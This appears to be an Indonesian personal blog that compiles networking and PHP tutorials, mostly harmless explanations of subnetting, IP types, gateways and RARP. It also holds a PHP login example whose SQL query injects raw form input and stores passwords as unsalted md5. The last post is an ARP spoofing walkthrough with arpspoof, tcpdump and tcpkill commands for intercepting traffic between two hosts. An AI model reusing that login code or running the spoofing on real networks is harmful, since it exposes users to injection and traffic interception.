Rabu, 21 Oktober 2009

. Rabu, 21 Oktober 2009

cara menghitung IP addres
Cara menghitung IP
Sekarang kita akan belajar menghitung IP : pertama siapkan calculator. Buka kalkulator di computer yang pasti setingnya scientific…! Penjelasannya langsung dengan contoh aja biar gampang OK

Contoh :
IP yang akan diteliti : 148.58.178.30 dengan nilai binernya (klo belum tau caranya ketik satu satu mulai dari 148 terus pilih bin, akan muncul angka 10010100, bgt seterusnya) didapat : 10010100.00111010.10110010.00011110 dng subnetmask 255.255.240.0

IP Adress 148.58.178.30 10010100.00111010.10110010.00011110
Subnet Mask 255.255.240.0 11111111.11111111.11110000.00000000

Hasil yang didapat dari perhitungan subnet mask adalah networkID, hostID dan jumlah host dalam 1 network, broadcasted maka didapat :

Network Addr 148.58.176.0 10010100.00111010.10110000.00000000
Broadcast Addr 148.58.191.255 10010100.00111010.10111111.11111111

Cara mendapatkan network address : lihat hasil biner IP address dan subnet mask, abaikan semua nilai 1 pada subnetmask, focus pada yg bernilai 0 dan ganti semua nilai IP address dengan nilai subnetmask yang bernilai 0, sehingga didapat nilai network 10010100.00111010.10110000.00000000 (atau 148.58.176.0 setelah di decimalkan)

Cara mendapatkan broadcast address : lihat hasil biner IP address dan subnet mask, focus pada subnetmask, balikkan semua nilai subnetmask dr 1 menjadi 0 maupun 0 menjadi 1.sehingga didapat 00000000.00000000.00001111.11111111.hasilnya :

IP Adress 148.58.178.30 10010100.00111010.10110010.00011110
Subnet Mask 00000000.00000000.00001111.11111111

Abaikan semua nilai 0 pada subnetmask, fokus pada nilai 1. ganti nilai IP address dengan nilai 1 pada subnet mask! Dan didapat :
10010100.00111010.10111111.11111111

atau bila di desimalkan nilainya 148.58.191.255. ya udah gitu aja....susah ngertinya ya...maklum bukan dosen. Ups...tp ada cara lain...! begini singkat aja biar artikelnya gak panjang .ok

contoh
IP addres 192.168. 1. 9
subnetmask 255.255.255.252

256 – 252 = 4 itu berarti nilai interval adalah 4 dan interval akan dimulai dari 0
0 – 3 (4 interval, dihitung mulai dr 0)
4 – 7
8 – 11
12 – 15 dst,(lanjutkan terus apabila belum menemukan nilai yg diharapkan misal contoh diatas adalah 9)
tp lihat pada nilai IP address nilai paling akhir adalah 9, dan lihat interval diatas angka 9 berada diantara 8 – 11 jadi nilai network addres dan broadcast addres :

network address 192.168.1.8
broadcast address 192.168.1.11

untuk nilai subnetmask yang lain, apabila tidak bernilai 255 maka bisa menggunakan cara cepat tsb. Kebetulan contoh diatas Cuma satu nilai yang bukan 255 jd Cuma perlu sekali perhitungan. Yang pasti nilai IP address berada di antara atau sama dengan network addres dan broadcast addres
rh0m4ir4m4 is offline
Updating Thanks, Please Wait

Klik disini untuk melanjutkan »»
.

PHP: Login dan Logout Memanfaatkan Session

2 Votes
Quantcast

Tutorial super-singkat ini memperlihatkan cara membuat aplikasi kecil di PHP yang berguna menangani Login dan Logout. Jika login berhasil, tentunya dengan memeriksa kecocokan username dan password maka sistem mengaktifkan variabel Session untuk pengguna yang berhasil login tersebut dan dapat mengakses halaman lain di dalam sistem. Jika pengguna Logout maka variabel Session di hapus dan otomatis tidak ada halaman yang dapat diakses oleh pengguna tersebut, kecuali halaman login.

Tutorial ini memerlukan 2 file PHP dan 1 tabel pada database server MySQL:

>> file index.php, file yang menangani Login dan Logout.
>> main.php, file yang menjadi target ketika login dinyatakan OK
>> Database tutorial dan tabel admin yang terdiri dari 3 field yaitu id (auto_increment), username (varchar 50), dan password (varchar 32). Field password dirancang untuk menggunakan mekanisme keamanan password md5().


Tambahkan satu baris (record) ke dalam tabel admin, misalnya “admin” utuk field username dan “1234” untuk password. Jangan lupa menggunakan fungsi md5() terhadap password. Paling mudah adalah memanfaatkan tool seperti PHPMyAdmin.

index.php

File ini terdiri dari 3 bagian penting, yaitu:

>> Form Login yang mengandung 2 field: “username” dan “password” dan sebuah tombol submit “Login”.
>> Program Otorisasi Login. Bagian ini memeriksa hasil submit dari form, jika username dan password valid maka halaman ini di-redirect ke main.php. Jika tidak maka tampilkan pesan kesalahan usernama atau password.
>> Logout. Di sini dilakukan pembersikan session login dan me-refresh halaman login.

01.
02.// gunakan variabel session pada halaman ini.
03.// fungsi ini harus diletakkan di awal halaman.
04.session_start();
05.
06.////// Bagian Logout. Delete variabel session.
07.session_destroy();
08.$message="";
09.
10.////// Bagian Login.
11.$Login=$_POST['Login'];
12.
13.if($Login){ // jika tombol Login diklik.
14. $username=$_POST['username'];
15. // Encrypt password dengan fungsi md5().
16. $md5_password=md5($_POST['password']);
17.
18. // Connect ke database.
19. $host="localhost"; // Host name.
20. $db_user=""; // MySQL username.
21. $db_password=""; // MySQL password.
22. $database="tutorial"; // Database.
23. mysql_connect($host,$db_user,$db_password);
24. mysql_select_db($database);
25.
26. // Cocokkan username dan password.
27. $result=mysql_query("select * from admin where username='$username' and password='$md5_password'");
28.
29. // Jika cocok.
30. if(mysql_num_rows($result)!='0'){
31. session_register("username"); // buat session username.
32. header("location:main.php"); // Re-direct ke main.php
33. exit;
34. } else{ // Jika tidak cocok.
35. $message="--- Username atau Password SALAH---";
36. }
37.} // akhir dari otorisasi Login.
38.
39.?>
41.
42."Content-Type" content="text/html; charset=utf-8" />
43.Halaman Login
44.
45.
46.echo $message; ?>
47.
"form1" name="form1" method="post" action="">
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
Username : "username" type="text" id="username" />
Password : "password" type="password" id="password" />
59.
60."Login" type="submit" id="Login" value="Login" />
61.
62.
63.

main.php

File ini merupakan target ketika pemeriksaan otorisasi pada file index.php dinyatakan sah (valid). Di sini dilakukan pemeriksaan nama variabel session “username”. Jika variabel ini tidak ada, dilakukan redirect ke halaman index.php.

Note: Jika kita mengharus pengguna Login sebelum mengakses suatu file PHP, maka anda dapat menyalin bagian PHP di bawah ini dan letakkan dibagian atas file PHP yang aksesnya hanya untuk pengguna yang login tersebut.

01.
02.// Bagian PHP ini dapat disalin ke bagian atas file yang memerlukan akses setelah login.
03.
04.// Gunakan variabel session pada halaman ini
05.//Fungsi ini harus diletakkan pada bagian atas halaman.
06.session_start();
07.
08.// jika variabel session "username" tidak ada.
09.if(!session_is_registered("username")){
10. // Re-direct ke index.php
11. header("location:index.php");
12.}
13.?>
14.
16.
17."Content-Type" content="text/html; charset=utf-8" />
18.Halaman Utama
19.
20.
21.

Halo bos echo $_SESSION['username']; ?>! Anda berhasil Login. Selamat datang di sini.

23.
24.

OK, demikian saja ya, semoga bermanfaat bagi pemula di pemrograman web dengan PHP.

Klik disini untuk melanjutkan »»
.

Sudah pernah mencoba iGoogle (http://www.google.com/ig) atau My Yahoo (http://cm.my.yahoo.com/)? Ada baiknya anda memulainya. Kedua situs ini menyediakan rangkuman berbagai informasi yang kita perlukan. Saya sudah memanfaatkan layanan iGoogle sejak 2008 awal dan sampai saat ini, cukup memuaskan. Saya memantau informasi dari berbagai sumber dari situs ini, misalnya detik.com, blog ini, blog istri tercinta di http://metamorphian.multiply.com, berbagai update tutorial dari devdaily.com, sourceforge.com dan lain-lain. Email yang ada di gmail juga tampil di sini. So, ini namanya one stop information access.
iGoogle.com menawarkan cara akses informasi dari satu pintu :)

iGoogle.com menawarkan cara akses informasi dari satu pintu

Klik disini untuk melanjutkan »»
.

ip static adalah ip yang yang telah diset dari server secara tersembunyi, jadi setiap client tidak bisa asal sembarang mengetik IP,mana tau ada IP yang conflik , jadi intinya static itu IP YANG DIISI SECCARA MANUAL

ip dinamis adalah IP yang diset dari server secara aotomatis, jadi client g perlu susah 2 mengeset IP, jika uda dalam satu jaringan maka IP itu akan langsung dapat

Klik disini untuk melanjutkan »»
.

Mungkin pertanyaan yang kamu maksud: "Bedanya IP Public dengan IP Private?" atau "Bedanya IP Dynamic dengan IP Static?"

IP Public itu lawannya IP Private. Sedangkan IP Static itu lawannya IP Dynamic.

IP Public bisa static, bisa juga dynamic.
Demikian juga IP Private, bisa static, bisa juga dynamic.

IP Public adalah IP yang bisa diakses langsung oleh internet. Analoginya IP Public itu seperti kamu punya nomer telepon rumah atau nomer HP yang bisa ditelepon langsung oleh semua orang.

Sedangkan IP Private biasanya digunakan dalam jaringan yang tidak terhubung ke internet atau bisa juga terhubung ke internet tapi melalui NAT. Analoginya IP private itu telepon lokal dalam kantor/hotel yang bisa buat telepon-teleponan gratis dalam satu gedung. Nah kalo ada orang yang mau telepon harus lewat operator dolo (NAT) karena nomer telepon publicnya cuma satu (hunting).

Nah kalo IP Dynamic itu berarti alokasi IPnya bisa berubah-ubah. Biasa menggunakan DHCP server. Di setting komputer kamu biasa pake setting automatic.
Kalo IP static ya sesuai namanya, dia tetap. Di komputer biasa di set manual.

Untuk Speedy. Speedy menggunakan IP Public & Dynamic
Setiap kamu connect kamu akan dapat satu IP public secara random. Kalo kamu bikin home server dengan menggunakan speedy yah koneksi speedy nya jangan sebentar-sebentar kamu putus. Ntar yang mengakses server kamu bingung karena IPnya gonta-ganti mulu.

Klik disini untuk melanjutkan »»
.

Melalui “penekanan” KONSEP jaringan private dan publik

Pengantar Pedagogis

Metode penyampaian materi ajar bisa bermacam-macam dan yang bermacam-macam itu bisa di ranking sehingga menjadi berlapis-lapis. Untuk satu materi ajar saja bisa jadi kita menemukan beberapa cara penyampaian yang berbeda dalam hal : urutan apa-apa yang akan dijelaskan lebih dulu, penekanan pokok bahasannya, model komunikasinya dan seterusnya.

Kalo saya bisa jadi menyiapkan beberapa jurus untuk menyampaikan materi ajar tertentu. Jurus-jurus tersebut ditemu-kembangkan gara-gara sering ‘banget’ menjelaskan materi itu untuk beberapa kelas paralel misalnya, sehingga kadang-kadang bahannya jadi luar kepala (di luar kepala semua ? :-) ). Tapi bukan hafalan bahan materi ajar itu yang penting di sini, tetapi bagaimana (strategi) cara kita menyampaikannya ke sejumlah ‘kepala’ pembelajar (mahasiswa) sehingga lebih mengena bagi mereka untuk cepat memahaminya. Ini ilmu pedagogis.

Lapisan strategi itu bisa ada beberapa untuk suatu materi. Misalnya materi : “Perancangan IP address ini”, bisa ada 3 lapis strategi tentang bagaimana menyampaikannya. Pemilihan strategi yang digunakan tentu tergantung penilaian kita tentang audience yang akan mendengarkan. Ini contoh strategi lapisan ke-2 dalam menjelaskan masalah penentuan (perancangan) IP Address ke jaringan komputer. Jika mutu audience - nya cukup parah (susah nyambung) gunakan strategi lapisan pertama, tetapi jika mutunya lumayan bagus (cepat nyambung) gunakan strategi lapisan ke 3.

Begitulah kalo ngajarnya ke mahasiswa swasta, kebutuhan adaptasinya tinggi. Di situlah seninya…

Pertanyaan awal :

Gimana sih cara menentukan IP address ke komputer-komputer di jaringan, apa asalan (terserah kita) aja? Ya enggak dong… Begini caranya :

Sebelumnya perhatikan gambar ini dulu … jaringan1.jpg

Maksud gambar di atas begini, …

Gambar 1 :

Jaringan komputer ada yang jenis private dan ada yang jenis public. Dari namanya saja jelas bahwa jaringan private berarti jaringan yang cakupan aksesnya terbatas (untuk kalangan tertentu) sedangkan jaringan publik cakupannya lebih luas (bahkan bisa dipakai untuk umum) .

Gambar 2 :

Dari Gambar 1 dan 2 jika dikaitkan dapat dijelaskan, bahwa jaringan private umumnya dibangun dengan teknologi LAN, sedangkan jaringan publik menggunakan teknologi WAN. (Apa itu teknologi LAN dan WAN pada kesempatan lain akan dijelaskan)

Gambar 3 :

Dari gambar 1, 2 dan 3 akhirnya dapat dijelaskan bahwa jaringan untuk sebuah perusahaan (atau sebuah instansi, perkantoran atau satu kampus) umumnya dibuat bersifat private (seperti yang telah dijelaskan hanya kalangan perusahaan itu saja yang boleh bergabung) dan menggunakan teknologi LAN. Sedangkan jaringan Internet adalah contoh dari jaringan publik (siapa saja boleh gabung, asal … apa ya?), dan sistemnya dibangun dengan teknologi WAN.

Akhirnya dari keseluruhan gambar di atas kita dapat simpulkan begini :

Komputer-komputer (atau disebut juga host kalau pada jaringan) yang berada pada LAN selalu (dianjurkan) menggunakan IP jenis private sedangkan host yang berada pada WAN (dalam hal ini internet) selalu (bahkan kalo ini tidak sekedar dianjurkan tapi diwajibkan) menggunakan IP jenis publik.

Apa itu IP private dan IP publik ?(Kalau anda bertanya seperti ini bagus, artinya anda mengikuti alur penjelasan di atas)

Begini, IP private adalah jenis IP yang saat akan menggunakannya tidak perlu diregistrasi sebab oleh router (ini semacam penggiring bola di internet) IP jenis ini tidak akan diteruskan kemana-mana. Sedangkan IP publik adalah jenis IP yang saat akan menggunakannya harus diregistrasi (ke badan penyalur IP address tentunya, maksudnya supaya tidak bentrok) karena IP ini dapat berkeliaran di lalu lintas jaringan internet melewati router-routernya.

Intinya dapat juga dikatakan begini : Komputer yang menggunakan IP private tidak dikenal di internet sedangkan yang menggunakan IP publik dapat dikenal di internet. Yang termasuk IP private adalah yang masuk dalam kelompok berikut :

10.0.0.1 s/d 10.255.255.254

172.16.0.1 s/d 172.31.255.254

192.168.0.1 s/d 192.168.255.254

Sedangkan yang termasuk IP Publik adalah selain dari range di atas (nanti akan dijelaskan bahwa ada pengecualian yang lain). Makanya, saat anda membangun LAN komputer-komputernya selalu diberi IP jenis private dan saat ada komputer tertentu yang akan dihubungkan langsung ke internet, maka mau tidak mau komputer tersebut harus diberi IP publik. Lalu, apakah komputer yang terlanjur (atau terpaksa kali ya ?) diberi IP private tersebut menjadi tidak dapat terhubung ke internet selamanya ? Untung saja jawabannya : tidak. Maksudnya ada cara tertentu (jurus kali ya?) agar komputer-komputer LAN tersebut dapat terhubung ke internet. Gimana dong caranya ?
Ada teknologi (umumnya berbentuk software) yang disebut NAT, singkatan dari : Network Address Translation. NAT dapat ‘merekonstruksi’ (translasi) IP private tadi menjadi IP publik sebelum dikirim ke internet (melalui router tentunya). jaringan2.jpg Bagaimana proses translasi (artinya semacam ‘perubahan’) dari IP private menjadi IP publik tadi oleh NAT ?
Ada beberapa metoda, tapi kurang relevan kalau dijelaskan di sini, nanti jadi panjang lebar. Kita fokus dulu ke masalah IP address di LAN tadi.Kenapa IP di LAN ‘harus’ (sebenarnya enggak harus juga sih) menggunakan IP Private ? Jawabannya, pertama agar pemilik LAN tidak perlu repot-repot mengurus pendaftaran (registered) IP yang akan digunakan oleh komputer-komputer LAN. Kasihan sekali kita jika setiap kali mau membuat LAN harus minta-minta IP address dulu ke “depkominfo” misalnya. Kedua dalam rangka menghemat penggunaan IP publik di internet. Sebab jika semua komputer yang terhubung ke internet menggunakan IP publik, bisa cepat habis tuh jatah bagi-bagi IP publik –nya (sekarang aja hampir habis, makanya muncul ‘ide’ IPV6). Perlu diperjelas di sini bahwa IP private untuk masing-masing LAN yang terhubung ke internet, dalam hal ini boleh sama, jadi IP private gak bakalan habis. Lalu apa bedanya komputer yang terhubung ke internet menggunakan IP private dengan yang menggunakan IP Publik? (Kok jadi cerita internet ya ?). Tapi itu pertanyaan bagus dan tentu ada jawabannya… Mau tau jawabannya…? (jadi kayak ngajar di kelas, gaya dia eh aku ya kira-kira begitu)Jawabannya begini : (Wah ini kan tugas ke mahasiswa untuk minggu depan, mudah-mudahan kalian pada gak baca artikel ini ya..).

Komputer yang terhubung ke Internet dengan IP publik dapat mengakses dan diakses dari mana saja oleh komputer lain di internet, sedangkan komputer yang menggunakan IP Private hanya dapat mengakses, tetapi tidak dapat diakses melalui internet secara langsung. Teori dasarnya begitu, tapi sama teknologi yang namanya PAT prinsip ini nanti bisa di “wes ewes ewes” alias dilabraknya (kasihan deh lo teori).

Wah, apalagi tu PAT ? Langsung aja ya, singkatan dari Port Address Translation. Silahkan browse di internet tentang “makhluk” (maksudnya PAT) ini.

Sebagai pelengkap perlu ditambahkan bahwa komputer yang terhubung ke internet dengan IP private akan memberikan efek “imun” ( kebal) terhadap kemungkinan serangan dari pecundang-pecundang (hacker-cracker) atau jelasnya dapat menambah fasilitas sekuriti komputer. Nah untuk yang satu ini ‘enaknya’ kita bahas di kuliah (pembahasan) “Sekuriti komputer” aja ya …

Kesimpulan pembahasan kita kira-kira begini :

Untuk jaringan LAN sebaiknya (dianjurkan) gunakan IP private, terserah mau pakai range yang mana dari 3 kelompok range yang telah disebutkan di atas Untuk terhubung ke internet mau tidak mau komputer harus menggunakan IP publik, atau melalui teknologi NAT atau PAT atau … (apa ada teknologi lain ya?)

Akhirnya : (Capek juga ya…)

Jika perusahaan anda membutuhkan IP publik yang cukup banyak (karena perusahaan anda “kaya” tentunya atau jangan-jangan “provider”), biasanya akan diberi IP dalam 1 blok (maksudnya 1 Network ID). Jika ternyata LAN yang dibutuhkan perusahaan anda banyak (lebih dari 1), tentu “semestinya” anda eh perusahaan anda harus membeli beberapa blok IP address. Wah gak mungkin dong, sekaya-kaya perusahaan emang duitnya untuk beli IP saja. Lalu gimana dong ? Ada metoda yang namanya “subnetting”. Nah yang ini akan lebih seru …Tunggu aja !!

Klik disini untuk melanjutkan »»
.

Gateway adalah sebuah perangkat yang digunakan untuk menghubungkan satu jaringan komputer dengan satu atau lebih jaringan komputer yang menggunakan protokol komunikasi yang berbeda sehingga informasi dari satu jaringan computer dapat diberikan kepada jaringan komputer lain yang protokolnya berbeda. Definisi tersebut adalah definisi gateway yang utama.

Seiring dengan merebaknya internet, definisi gateway seringkali bergeser. Tidak jarang pula pemula menyamakan "gateway" dengan "router" yang sebetulnya tidak benar.

Kadangkala, kata "gateway" digunakan untuk mendeskripkan perangkat yang menghubungkan jaringan komputer besar dengan jaringan komputer besar lainnya. Hal ini muncul karena seringkali perbedaan protokol komunikasi dalam jaringan komputer hanya terjadi di tingkat jaringan komputer yang besa

Klik disini untuk melanjutkan »»
.

Alamat Reverse Resolusi Protocol (RARP) adalah Link lapisan jaringan protokol yang digunakan oleh host untuk komputer yang mendapatkan alamat IPv4 yang diberikan hanya dengan alamat link-lapisan (seperti Ethernet alamat). RARP dijelaskan dalam IETF publikasi RFC 903. Ia telah lapuk yang diberikan oleh Protokol Bootstrap dan modern Dynamic Host Configuration Protocol, yang baik dukungan yang lebih besar daripada fitur menetapkan RARP.

RARP memerlukan satu atau lebih server host untuk menjaga database pemetaan dari alamat Layer Link ke alamat protokol. Alamat MAC yang diperlukan untuk dapat dikonfigurasi secara individual pada server oleh seorang administrator. RARP adalah terbatas, sehubungan protokol untuk konfigurasi yang lebih baru, untuk melayani alamat IP saja.

Reverse ARP berbeda dari Invers Alamat Resolution Protocol (InARP), yang dirancang untuk mencari alamat IP lain yang terkait dengan stasiun alamat MAC. InARP adalah melengkapi dari Protokol Resolusi Alamat digunakan untuk lookup sebaliknya. RARP hanya digunakan untuk lookup dari host sendiri alamat IP

Klik disini untuk melanjutkan »»
.

ARP Spoofing n Sniffing


Address Resolution Protocol (ARP) adalah protokol untuk mapping dari alamat IP (Internet Protocol) ke alamat fisik MAC (Media Access Control). Misal di suatu jaringan kita ingin mengirim paket ke host A 192.168.1.2, maka pertama kita harus tau sapa yg mempunyai alamat IP tsb. Maka ARP akan membroadcast pertanyaan tsb ke semua host yang ada di jaringan. Sang empunya alamat IP tsb akan menjawab kembali sahutan tsb dengan mengirimkan alamat MACnya. Alamat MAC ini akan disimpan di tabel ARP untuk memudahkan pencarian jika diperlukan pengiriman paket ke tujuan yang sama.

Kayak gimana sih bentuk format frame ARP? Terdiri dari 2 bagian, yaitu header ethernet dan paket ARP. Header ethernet berupa :
- 6 byte alamat tujuan
- 6 byte alamat pengirim
- 2 byte jenis frame ARP

Sedangkan paket ARPna berupa :
- 2 byte jenis alamat hardware (1 = ethernet)
- 2 byte jenis protokol yang di map (0800H = alamat IP)
- 1 byte ukuran alamat hardware
- 1 byte ukuran protokol
- 2 byte tipe operasi (1 = ARP request, 2=ARP reply, 3=*RARP request
,4=RARP reply)
- 6 byte alamat ethernet pengirim
- 4 byte alamat IP pengirim
- 6 byte alamat ethernet penerima
- 4 byte alamat IP penerima

*RARP (Reverse Address Resolution Protocol) digunakan untuk sistem komputer diskless, guna mendapatkan alamat IP mereka saat boot.

ARP Spoofing merupakan suatu kegiatan yang memanipulasi paket ARP. Misal paket X dari komputer A ditujukan untuk komputer B, ketika komputer A membroadcast paket ARP di jaringan, maka komputer C sang manipulator dapat "meracuni" (Posioning) paket ARP tsb agar paket X ditujukan ke komputer C terlebih dahulu baru diforward ke komputer B. Poisoning ini mengganti alamat MAC komputer B dengan alamat MAC komputer C di tabel ARP komputer A dan sebaliknya, alamat MAC komputer A diganti menjadi alamat MAC komputer C di tabel ARP komputer B. Jenis-jenis serangan yang bisa dilakukan dnegan ARP Spoofing diantarana adalah sniffing, Man in the Middle, MAC Flooding, DoS (Denial of Service), Hijacking n Cloning.

Apa ajah sih yg diperluin buat ARP Spoofing ini? Kalo aq sih pake arpspoof yang ada di paket dsniff-2.3 untuk OS Linux. Ohiya, sebelum menginstall dsniff ini perlu dicek apakah di sistem yang digunain dah terinstall libnet ma libnids. Jangan lupa untuk jenis attacking sniffing ato MIM perlu IP Forwarding diaktifkan (echo 1 > /proc/sys/net/ipv4/ip_forward).

Seperti biasa, unpack paket dsniff lalu configure n terakhir make install. Ohiya, pas saat make, aq sempet dapet error compiling module sshcrypto :

sshcrypto.c:30: error: parse error before "des_key_schedule"
....blablabla
....blablabla
*** Error code 1

Solusina kita buka n edit file sshcrypto.c di folder dsniff-2.3, tambahin :

#include
#include

di deklarasi file header yang diperlukan. Bila dah kelar n gak da error lagi, coba jalanin si dsniff ato si arpspoof :)

Yuukk kita coba meracuni n ngendus paket antara komputer A 192.168.1.1 n komputer B 192.168.1.3, komputer C (attacker) 192.168.1.6.

jalanin si arpspoof terlebih dahulu :

root@slack:~# arpspoof -t 192.168.1.1 192.168.1.3 & >/dev/null
root@slack:~# arpspoof -t 192.168.1.3 192.168.1.1 & >/dev/null

kalo dah bener nanti di console akan muncul kayak gini :

0:c:29:3e:2d:46 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:c:29:3e:2d:46
0:e0:29:63:d1:6 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:e0:29:63:d1:6

Setelah itu bisa kita endus pake dsniff ato tcpdump, misal mo pake tcpdump bisa kita capture hasilna ke file, pake :

root@slack:~# tcpdump -i eth0 -w endus.txt

dimana eth0 adalah interface card dan endus.txt adalah nama file outputna :). Kalo file tsb dibuka masi kaco isina >.<, jadi bisa kita liat pake tcpdump juga, pake :

root@slack:~# tcpdump -r endus.txt

hehehehe lumayan asik kan ARP Spoofing, gak hanya buat sniffing juga tapi bisa kita blok koneksi tertentu misal :

root@slack:~# tcpkill -9 host www.playboy.com

Untuk matiin proses si arpspoof n tcpdump bisa dengan cara :

root@slack:~# killall arpspoof
root@slack:~# killall tcpdump

Klik disini untuk melanjutkan »»
 

Pengikut

About Me

{assoka jepara} is proudly powered by dirubah oleh assoka | Template by Agus Ramadhani | assoka